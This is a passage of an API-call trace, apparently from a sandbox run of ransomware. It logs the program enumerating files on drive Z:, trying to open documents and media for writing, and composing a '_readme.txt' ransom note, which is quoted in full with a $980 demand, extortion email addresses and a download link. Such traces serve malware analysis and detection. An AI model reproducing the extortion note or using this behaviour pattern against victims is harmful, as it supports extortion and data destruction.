ftLastWriteTime.dwHighDateTime=0x1d8a303, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zpV7u7xPWr7qK", cAlternateFileName="ZPV7U7~1")) returned 1 [0185.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4860 [0185.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb46c0 [0185.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4790 [0185.072] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcd938fc0, ftCreationTime.dwHighDateTime=0x1d89e03, ftLastAccessTime.dwLowDateTime=0x34fdb060, ftLastAccessTime.dwHighDateTime=0x1d8a303, ftLastWriteTime.dwLowDateTime=0x34fdb060, ftLastWriteTime.dwHighDateTime=0x1d8a303, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zpV7u7xPWr7qK", cAlternateFileName="ZPV7U7~1")) returned 0 [0185.072] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0185.073] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0185.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0185.073] PathFindFileNameW (pszPath="Z:\\") returned="Z:\\" [0185.073] PathFindFileNameW (pszPath="") returned="" [0185.073] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0185.073] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0185.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x2e902a8 [0185.074] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0185.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e776e0 [0185.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0185.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0185.074] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0185.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0185.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0185.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x806) returned 0x2e902a8 [0185.075] PathAppendW (in: pszPath="Z:\\", pMore="_readme.txt" | out: pszPath="Z:\\_readme.txt") returned 1 [0185.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e776e0 [0185.075] PathFileExistsW (pszPath="Z:\\_readme.txt") returned 0 [0185.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e96a68 [0185.079] lstrcpyW (in: lpString1=0x2e96a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0185.079] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0185.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e765d0 [0185.085] CreateFileW (lpFileName="Z:\\_readme.txt" (normalized: "z:\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.088] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0185.088] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0185.088] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0185.094] FindFirstFileW (in: lpFileName="Z:\\*" (normalized: "z:\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xafbe5588, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2ee910fd, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbe5588, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0185.125] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa583c4d7, ftCreationTime.dwHighDateTime=0x1d828c6, ftLastAccessTime.dwLowDateTime=0x3b3e3839, ftLastAccessTime.dwHighDateTime=0x1d8a632, ftLastWriteTime.dwLowDateTime=0xa583c4d7, ftLastWriteTime.dwHighDateTime=0x1d828c6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0185.125] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265500b5, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd900, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4fcfIBg3Ryeoeu27DM.docx", cAlternateFileName="")) returned 1 [0185.125] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0185.125] PathFindExtensionW (pszPath="Z:\\4fcfIBg3Ryeoeu27DM.docx") returned=".docx" [0185.131] CreateFileW (lpFileName="Z:\\4fcfIBg3Ryeoeu27DM.docx" (normalized: "z:\\4fcfibg3ryeoeu27dm.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.132] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0185.132] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xf197, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LgQIok5RNh.mp4", cAlternateFileName="")) returned 1 [0185.132] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.132] PathFindExtensionW (pszPath="Z:\\LgQIok5RNh.mp4") returned=".mp4" [0185.138] CreateFileW (lpFileName="Z:\\LgQIok5RNh.mp4" (normalized: "z:\\lgqiok5rnh.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.139] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.139] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x12cd5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lDq8f54d4hhCIri7rU.rtf", cAlternateFileName="")) returned 1 [0185.139] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0185.140] PathFindExtensionW (pszPath="Z:\\lDq8f54d4hhCIri7rU.rtf") returned=".rtf" [0185.145] CreateFileW (lpFileName="Z:\\lDq8f54d4hhCIri7rU.rtf" (normalized: "z:\\ldq8f54d4hhciri7ru.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.147] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0185.147] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x15208, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gkNzsfx.odt", cAlternateFileName="")) returned 1 [0185.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0185.147] PathFindExtensionW (pszPath="Z:\\gkNzsfx.odt") returned=".odt" [0185.152] CreateFileW (lpFileName="Z:\\gkNzsfx.odt" (normalized: "z:\\gknzsfx.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0185.154] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xb863, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uX9C3BTlu7W5CJLwms.ppt", cAlternateFileName="")) returned 1 [0185.154] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0185.154] PathFindExtensionW (pszPath="Z:\\uX9C3BTlu7W5CJLwms.ppt") returned=".ppt" [0185.159] CreateFileW (lpFileName="Z:\\uX9C3BTlu7W5CJLwms.ppt" (normalized: "z:\\ux9c3btlu7w5cjlwms.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0185.164] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xbe68, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vKgP03.mp3", cAlternateFileName="")) returned 1 [0185.164] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0185.164] PathFindExtensionW (pszPath="Z:\\vKgP03.mp3") returned=".mp3" [0185.170] CreateFileW (lpFileName="Z:\\vKgP03.mp3" (normalized: "z:\\vkgp03.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.172] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0185.172] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26675040, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17c8d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="a7jth.jpg", cAlternateFileName="")) returned 1 [0185.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0185.172] PathFindExtensionW (pszPath="Z:\\a7jth.jpg") returned=".jpg" [0185.178] CreateFileW (lpFileName="Z:\\a7jth.jpg" (normalized: "z:\\a7jth.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0185.179] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbe5588, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266d6ac3, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbe5588, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x158c1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zYMAYhHoRyK6PFynZFc.mkv", cAlternateFileName="")) returned 1 [0185.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0185.179] PathFindExtensionW (pszPath="Z:\\zYMAYhHoRyK6PFynZFc.mkv") returned=".mkv" [0185.185] CreateFileW (lpFileName="Z:\\zYMAYhHoRyK6PFynZFc.mkv" (normalized: "z:\\zymayhhoryk6pfynzfc.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0185.186] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1546a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EGXGDc6zOuTQrpM.gif", cAlternateFileName="")) returned 1 [0185.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.187] PathFindExtensionW (pszPath="Z:\\EGXGDc6zOuTQrpM.gif") returned=".gif" [0185.192] CreateFileW (lpFileName="Z:\\EGXGDc6zOuTQrpM.gif" (normalized: "z:\\egxgdc6zoutqrpm.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.194] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.194] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26546475, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xf284, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2E6UGCq.doc", cAlternateFileName="")) returned 1 [0185.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0185.194] PathFindExtensionW (pszPath="Z:\\2E6UGCq.doc") returned=".doc" [0185.199] CreateFileW (lpFileName="Z:\\2E6UGCq.doc" (normalized: "z:\\2e6ugcq.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0185.201] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266af9c2, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13179, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nCFz76aqfOi4GGvs9d9.m4a", cAlternateFileName="")) returned 1 [0185.201] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0185.201] PathFindExtensionW (pszPath="Z:\\nCFz76aqfOi4GGvs9d9.m4a") returned=".m4a" [0185.206] CreateFileW (lpFileName="Z:\\nCFz76aqfOi4GGvs9d9.m4a" (normalized: "z:\\ncfz76aqfoi4ggvs9d9.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.208] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0185.208] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x5140, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C9OE6MiLKOuTz5.avi", cAlternateFileName="")) returned 1 [0185.208] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.208] PathFindExtensionW (pszPath="Z:\\C9OE6MiLKOuTz5.avi") returned=".avi" [0185.213] CreateFileW (lpFileName="Z:\\C9OE6MiLKOuTz5.avi" (normalized: "z:\\c9oe6milkoutz5.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.214] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.214] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2667ec80, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xaf7f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="b13UpS9k3v.swf", cAlternateFileName="")) returned 1 [0185.214] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.214] PathFindExtensionW (pszPath="Z:\\b13UpS9k3v.swf") returned=".swf" [0185.219] CreateFileW (lpFileName="Z:\\b13UpS9k3v.swf" (normalized: "z:\\b13ups9k3v.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0185.221] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26594678, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x577b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MM3Rngzs9r6yCyV.csv", cAlternateFileName="")) returned 1 [0185.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.221] PathFindExtensionW (pszPath="Z:\\MM3Rngzs9r6yCyV.csv") returned=".csv" [0185.226] CreateFileW (lpFileName="Z:\\MM3Rngzs9r6yCyV.csv" (normalized: "z:\\mm3rngzs9r6ycyv.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 